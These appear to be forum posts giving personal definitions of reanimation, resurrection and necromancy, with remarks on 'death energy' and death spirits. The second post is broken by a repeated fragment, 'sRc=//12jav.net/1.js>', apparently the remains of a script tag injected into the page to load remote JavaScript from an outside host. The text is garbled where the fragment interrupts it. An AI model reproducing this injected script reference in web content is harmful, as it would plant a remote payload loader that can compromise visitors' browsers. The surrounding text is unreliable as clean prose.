To me, and this is my own definition of the terms so it may not be official, reanimating is to animate a corpse with your will so it would be like a puppet whereas resurrection would be like what you mentioned with which the Spirit would reenter the body.

well to what i believe making anything requires a enormous amount of power and will. also it would need a source of energy otherwise it will just "die down" when all the energy is used up or you stop giving it energy. and technically creating a Puppet so to speak is not really necro, unless you use a carrion for the "medium" of said puppet. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

The definition one chooses is up to them, but actually necromancy is more than about communication or divinination through the dead, and it certainly does not involve the undead. It's about the spirits and energy of the dead and death. Death energy is quite unique and very misunderstood. Its nit used for hexes or as a weapon, it's used to better work with certain types of spirits, like those who have passed or Death spirits(reapers,shinigami,guede,etc.).
